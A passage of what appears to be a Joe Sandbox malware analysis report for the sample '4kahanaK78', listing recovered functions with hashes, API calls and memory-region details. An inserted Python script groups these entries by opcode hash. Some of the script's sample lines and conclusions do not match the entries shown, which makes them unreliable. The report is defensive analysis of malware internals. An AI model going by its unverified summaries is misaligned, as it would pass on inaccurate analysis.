                                    • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D89000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d89000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                    • Instruction ID: 1eba06374248a319380b9ff93c9580b1e09e22f207747a03da85b3d9d7681480
                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                    • Instruction Fuzzy Hash: 0611AC72340201AFD744EE55DCD5EA6B3EAEB88320B2D8065ED48CB352D676E802C760
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                    • Instruction ID: 293818218bedeef1481949536c6cc3e7b8a6b3c3ef9f58d5a142aa209fb16be8
                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                    • Instruction Fuzzy Hash: 8801A276A006148FDF21EF24CC04BAA33F5EFC6216F4548F5EA0A9B281E774B9459B90
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction ID: 1921a5297b8c6c131afecabf540933813d04e502e30cb84c4d37dd4a19787586
                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction Fuzzy Hash: 04E08C32911238EBCB24DB9DC90498AF3EDEB44B00B1544A6B601D3200C274EE00E7D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                    • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                    • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                    • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction ID: 246488dfe49aa5c32b350fed1d045568dcfc0a17c0cb868f336d2f696df64edd
                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction Fuzzy Hash: 39E08C72911268EBCB25DB8CC945E8AF3FCEB44B80B114496BD01D3220C270EE00C7D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                    • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                    • Instruction ID: b91f9200a165f7f20a789dd953a104fe294c578cebaf163ccbdad38ff115fb37
                                    • Opcode Fuzzy Hash: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                    • Instruction Fuzzy Hash: E7E04631400148BFCB117F25CC48D993F3AEB00281B004424F90986131CB39EE82DA54
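Each function above is listed once per memory dump it was recovered from. The Opcode ID repeats across dumps while the Instruction ID differs, which is consistent with the Opcode ID covering only the instruction mnemonics (stable when code is relocated) and the Instruction ID also covering operands. Grouping entries by Opcode ID therefore shows which memory regions hold copies of the same function, and the .sdmp file name carries the region's base address plus two fields that line up with the winnt.h PAGE_* and MEM_* constants, so a private RWX region and the MEM_IMAGE region at 00400000 can be told apart. The script below is an added example, not part of the Joe Sandbox report or its tooling: the field layout of the .sdmp name is inferred from the names on this page (an assumption, not documented here), and the sample lines are excerpted verbatim from the entries above.

```python
import re
from collections import defaultdict

# Windows memory constants (winnt.h) used to decode two fields of the dump name.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Excerpt of the report above, reduced to the three line kinds this script reads.
REPORT = """\
Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction ID: f0098194cef53a99a5c501967b9cf24841fb35c31397b7ca8774a3519f6b4b04
Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction ID: e73887866517eae7714d013718d8a8bd1de4ec71e4a0f3fa3c223a6bd36a49e9
Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7a73fe8d35e3d71c5c24f5c0b821b3dd9abe8ae56d6465770b908d97031b84e3
Source File: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D89000, based on PE: false
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 1eba06374248a319380b9ff93c9580b1e09e22f207747a03da85b3d9d7681480
"""

SOURCE_RE = re.compile(
    r"Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)"
)


def parse_dump_name(name):
    """Decode a .sdmp file name.

    Assumed layout, inferred from the names on this page (not documented here):
    pid.phase.dumpid.base.protect.state.type.extra.sdmp, every field hex.
    Fields 5 and 7 line up with the PAGE_* and MEM_* constants and are decoded;
    the other fields are kept raw or dropped.
    """
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    pid, phase, _dump_id, base, protect, _state, mem_type, _extra = (
        int(f, 16) for f in fields
    )
    return {
        "pid": pid,
        "phase": phase,
        "base": base,
        "protect": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
        "type": MEM_TYPE.get(mem_type, f"0x{mem_type:x}"),
    }


def parse_report(text):
    """Pair every 'Opcode ID' with the memory dump it was recovered from."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        m = SOURCE_RE.match(line)
        if m:
            current = parse_dump_name(m.group(1))
            current["pe"] = m.group(3) == "true"
        elif line.startswith("Opcode ID: ") and current is not None:
            records.append(dict(current, opcode_id=line.split(": ", 1)[1]))
        elif line.startswith("Instruction ID: ") and records:
            records[-1]["instruction_id"] = line.split(": ", 1)[1]
    return records


def by_opcode(records):
    """Map opcode id -> sorted list of (base, protection, type) it was seen in."""
    seen = defaultdict(set)
    for r in records:
        seen[r["opcode_id"]].add((r["base"], r["protect"], r["type"]))
    return {oid: sorted(places) for oid, places in seen.items()}


def shared_with_image(records):
    """Opcode ids present both in a MEM_IMAGE region and in private memory,
    i.e. functions of the on-disk module that also live in unpacked regions."""
    shared = set()
    for oid, places in by_opcode(records).items():
        types = {t for _, _, t in places}
        if "MEM_IMAGE" in types and "MEM_PRIVATE" in types:
            shared.add(oid)
    return shared


if __name__ == "__main__":
    recs = parse_report(REPORT)
    for oid, places in by_opcode(recs).items():
        print(oid[:16], [(hex(b), p, t) for b, p, t in places])
    print("also in the image:", sorted(shared_with_image(recs)))
```

Run against the excerpt, this groups a72ccc6e... into three regions (the RW private PE staged at 04CE0000, the RWX private region at 04B40000, and the RWX image at 00400000) and flags it as shared with the image, while 567adef0... appears only in private memory (10000000 and 04B40000) and 80fd216e... only at 00D89000. The same correlation applies to the CRT locale cleanup function further down, whose Opcode ID 618733a9... is reported from both 04CE0000 and 04B40000.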
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                    • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                    Strings
                                    • WakeAllConditionVariable, xrefs: 004090C8
                                    • SleepConditionVariableCS, xrefs: 004090BC
                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                    • kernel32.dll, xrefs: 004090AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                    • API String ID: 2565136772-3242537097
                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                    • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                    APIs
                                    • _free.LIBCMT ref: 04CF661C
                                    • ___free_lconv_mon.LIBCMT ref: 04CF6627
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6300
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6312
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6324
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6336
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6348
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF635A
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF636C
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF637E
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6390
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63A2
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63B4
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63C6
                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63D8
                                    • _free.LIBCMT ref: 04CF663E
                                    • _free.LIBCMT ref: 04CF6653
                                    • _free.LIBCMT ref: 04CF665E
                                    • _free.LIBCMT ref: 04CF6680
                                    • _free.LIBCMT ref: 04CF6693
                                    • _free.LIBCMT ref: 04CF66A1
                                    • _free.LIBCMT ref: 04CF66AC
                                    • _free.LIBCMT ref: 04CF66E4
                                    • _free.LIBCMT ref: 04CF66EB
                                    • _free.LIBCMT ref: 04CF6708
                                    • _free.LIBCMT ref: 04CF6720
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$___free_lconv_mon
                                    • String ID:
                                    • API String ID: 3658870901-0
                                    • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction ID: b7e77e35eb60a52c49567081d144d294a1647fec1457516d92eb22022a24bd54
                                    • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction Fuzzy Hash: C8314B317006009FEBA1AE39DC44B5A77EAAF00714F14842AE295D7252DF7AFA51DB20
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 1000A045
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                    • _free.LIBCMT ref: 1000A03A
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 1000A05C
                                    • _free.LIBCMT ref: 1000A071
                                    • _free.LIBCMT ref: 1000A07C
                                    • _free.LIBCMT ref: 1000A09E
                                    • _free.LIBCMT ref: 1000A0B1
                                    • _free.LIBCMT ref: 1000A0BF
                                    • _free.LIBCMT ref: 1000A0CA
                                    • _free.LIBCMT ref: 1000A102
                                    • _free.LIBCMT ref: 1000A109
                                    • _free.LIBCMT ref: 1000A126
                                    • _free.LIBCMT ref: 1000A13E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                    • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                    • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                    • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 04B5748E
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57167
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57179
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5718B
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5719D
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571AF
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571C1
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571D3
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571E5
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571F7
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57209
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5721B
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5722D
                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5723F
                                    • _free.LIBCMT ref: 04B57483
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B574A5
                                    • _free.LIBCMT ref: 04B574BA
                                    • _free.LIBCMT ref: 04B574C5
                                    • _free.LIBCMT ref: 04B574E7
                                    • _free.LIBCMT ref: 04B574FA
                                    • _free.LIBCMT ref: 04B57508
                                    • _free.LIBCMT ref: 04B57513
                                    • _free.LIBCMT ref: 04B5754B
                                    • _free.LIBCMT ref: 04B57552
                                    • _free.LIBCMT ref: 04B5756F
                                    • _free.LIBCMT ref: 04B57587
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction ID: 14cb6ab2ab1a9437f4c82fe233bb491e545522ac7e1cbfa12bd6e5481a9237c1
                                    • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                    • Instruction Fuzzy Hash: 95316B31B00605AFEB25AE3DE844B5AF7E8EF00354F50489AE869D71B0DF74F8409B20
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 00417227
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                    • _free.LIBCMT ref: 0041721C
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 0041723E
                                    • _free.LIBCMT ref: 00417253
                                    • _free.LIBCMT ref: 0041725E
                                    • _free.LIBCMT ref: 00417280
                                    • _free.LIBCMT ref: 00417293
                                    • _free.LIBCMT ref: 004172A1
                                    • _free.LIBCMT ref: 004172AC
                                    • _free.LIBCMT ref: 004172E4
                                    • _free.LIBCMT ref: 004172EB
                                    • _free.LIBCMT ref: 00417308
                                    • _free.LIBCMT ref: 00417320
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                    • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                    • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                    • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA5D8
                                    • type_info::operator==.LIBVCRUNTIME ref: 04CEA5FA
                                    • ___TypeMatch.LIBVCRUNTIME ref: 04CEA709
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04CEA7DB
                                    • _UnwindNestedFrames.LIBCMT ref: 04CEA85F
                                    • CallUnexpected.LIBVCRUNTIME ref: 04CEA87A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2123188842-393685449
                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction ID: f1706070d7e07c16339ef952349df60172e4e25346c463a27abe9f38e1578fb9
                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction Fuzzy Hash: 8AB17C71800209EFDF29DFA6D9809BEBBB6BF04314B14815AE8156B211D732FA52DB91
                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B43F
                                    • type_info::operator==.LIBVCRUNTIME ref: 04B4B461
                                    • ___TypeMatch.LIBVCRUNTIME ref: 04B4B570
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B642
                                    • _UnwindNestedFrames.LIBCMT ref: 04B4B6C6
                                    • CallUnexpected.LIBVCRUNTIME ref: 04B4B6E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2123188842-393685449
                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction ID: f958f8c1c06dd8ad2a3a2dda83ddbe627588a88ea3576b8e757bd005fb919053
                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction Fuzzy Hash: 45B16C71C04209EFDF15DFA8C8809AEB7B5FF88314B14459AEA156B211D730FA51EFA1
                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                    • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                    • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                    • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2123188842-393685449
                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                    • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                    • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                    • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
